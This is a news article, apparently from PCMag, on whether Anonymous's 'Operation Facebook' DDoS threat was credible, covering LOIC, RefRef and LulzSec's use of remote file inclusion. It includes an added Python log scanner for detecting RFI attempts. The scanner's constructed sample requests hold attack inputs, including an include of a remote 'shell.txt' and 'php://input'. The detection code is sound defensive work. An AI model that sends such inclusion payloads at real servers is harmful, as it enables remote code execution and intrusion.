How credible is the Anonymous threat to "destroy" and "kill" Facebook on Nov. 5? PCMag spoke with Sophos senior security adviser Chester Wisniewski Wednesday to get a read on whether the loosely organized hacking group could actually pull it off.
The first question Wisniewski had concerned whether the so-called Operation Facebook threat is actually coming from Anonymous itself.
"When you decide to become associated or affiliated with anyone who can decide that they don't want to disclose their identity, then I guess anyone can speak for the group. I could be Anonymous or you could be Anonymous," he said.
It's a point worth raising, because AnonOps, as close to a reliable mouthpiece as there is for goings-on within Anonymous writ large, initially distanced itself from Operation Facebook.
"We don't 'kill' the messenger. That's not our style," the @anonops Twitter feed tweeted early Wednesday morning. Indeed, AnonOps and the affiliated hacker group LulzSec have used social media to spread their PR message to great effect in recent months.
But AnonOps later tweeted that Operation Facebook "is being organised by some Anons. This does not necessarily mean that all of #Anonymous agrees with it."
A more interesting question is whether Anonymous could possibly take down the social networking giant, even at full strength. And AnonOps may have had good reason to be wary of Operation Facebook, given that Anonymous has attempted such an ambitious operation before, according to Wisniewski.
"Theoretically, any website can be taken down, if you have a large enough group of people who want to take it down," he said. "Certainly, we've seen Anonymous take on Facebook in the past, around the New Year. And there were some tweets from, I think, AnonOps, saying things like, 'Holy crap! We were only able to impact it for a few seconds.'"
Anonymous had similarly dismal results in an attempted take-down of Amazon—and there's a reason for that. The language of the Operation Facebook announcement suggests a Distributed Denial-of-Service (DDoS) attack of the sort Anonymous and LulzSec have used to temporarily shut down websites belonging to the CIA, the U.K.'s Organized Crime Agency, and others.
But such blunt-force attacks, which basically bombard websites with so many external requests that they simply can't stay online, aren't likely to work on Facebook, Wisniewski said.
Copyright © 2010 Ziff Davis Publishing Holdings Inc.
Why you can't DDoS a Facebook
"Whether [Operation Facebook] is even a credible threat is one question," Wisniewski said. "The other question is, if it is a credible threat, do they have the resources to take down a Facebook? And the answer to that, certainly through DDoS, is that it's very unlikely. Amazon, Microsoft, Google, Facebook, these guys have globally distributed, massively redundant resources available to them."
Such websites "will either have that spare capacity themselves" to handle even a massive DDoS attack without going offline, he added, "or have relationships with the backhaul carriers to get it if they need it."
One intriguing development, however, is Anonymous' recent announcement that the collective plans to retire its "Low Orbit Ion Cannon" DDoS tool in favor of a new, more sophisticated tool called RefRef that supposedly uses an SQL exploit to conduct website take-downs.
The Low Orbit Ion Cannon, or LOIC, is essentially a voluntary botnet that leverages the power of a large number of "infected" PCs belonging to Anonymous members to launch massive DDoS attacks against targeted sites.
The LOIC's replacement could "have an enormous impact," according to Wisniewski, "if they're not full of crap."
"To begin with, LOIC is the least sophisticated possible thing you can do," the Sophos security adviser said. "Without taking [RefRef] apart, it's really difficult to know what it does. But what they're saying [with the new tool] is that there is a weakness or a flaw in a lot of websites that, by sending a specially crafted Web request, you can cache some JavaScript on the Web server itself, and get the Web server to do the DoS'ing [of its own website] for you."
Imperva found that the group turned a relatively little known intrusion tool called an RFI attack into a new way to conduct a DDoS attack.
"In other words, LulzSec used an often overlooked vulnerability to help ambush their targets," Imperva director of security strategy Rob Rachwald told PCMag in June. "An RFI attack inserts some nasty code into a Web application server. What does the code do? Usually, RFI is used to take over the Web application and steal data. In the case of LulzSec, they used it to conduct DDoS attacks."
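As an added defender-side example (not from the article, Imperva or Sophos), the RFI pattern Rachwald describes leaves a recognisable trace in web server access logs: a request parameter whose value is itself a URL or a PHP stream wrapper is an attempt to make the application fetch and run code it did not ship with. The log lines, field names and regular expressions below are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (not real traffic), Apache combined-log style.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Nov/2011:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
203.0.113.6 - - [01/Nov/2011:10:00:02 +0000] "GET /index.php?page=http://198.51.100.9/shell.txt HTTP/1.1" 200 88
203.0.113.7 - - [01/Nov/2011:10:00:03 +0000] "GET /view.php?tpl=php://input HTTP/1.1" 500 0
203.0.113.8 - - [01/Nov/2011:10:00:04 +0000] "GET /view.php?tpl=%68%74%74%70://198.51.100.9/x HTTP/1.1" 200 70
"""

# Pull the client IP and the request target out of each log line.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (?P<target>\S+) HTTP/')

# A parameter value that begins with a remote URL scheme or a PHP stream wrapper
# is the signature of a remote file inclusion attempt; plain values never carry a scheme.
RFI_VALUE_RE = re.compile(r'^(?:https?|ftps?|php|expect|file|glob|phar|data):', re.I)


def decode_param(value: str) -> str:
    """URL-decode twice so single- and double-encoded schemes are both visible."""
    return unquote(unquote(value)).strip()


def find_rfi_attempts(log_text: str) -> list:
    """Return one finding per query parameter whose value looks like an include target."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        query = urlsplit(m.group('target')).query
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for raw in values:
                decoded = decode_param(raw)
                if RFI_VALUE_RE.match(decoded):
                    findings.append({'ip': m.group('ip'), 'param': param, 'value': decoded})
    return findings


if __name__ == '__main__':
    for f in find_rfi_attempts(SAMPLE_LOG):
        print(f"{f['ip']} tried to include {f['value']!r} via parameter {f['param']!r}")
```

Only requests whose parameter values begin with a scheme are flagged, so the legitimate `page=about` line produces no finding while the percent-encoded `http://` on the last line still does.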
But even if RefRef turns out to be a better tool than the LOIC, it's not likely to work with Facebook, Wisniewski said.
"From the standpoint of Facebook, a RefRef attack shouldn't be possible as very little SQL is in use at Facebook and what is in use is heavily abstracted from the internet."
Another possibility, of course, is that the Anons running Operation Facebook aren't planning a DDoS attack at all. In addition to website shutdowns, the hacking collective has also pulled off or had a hand in network intrusions, some showcasing fairly clever attack vectors, according to Imperva.
Perhaps Operation Facebook has less to do with simply taking the site offline than everybody thinks.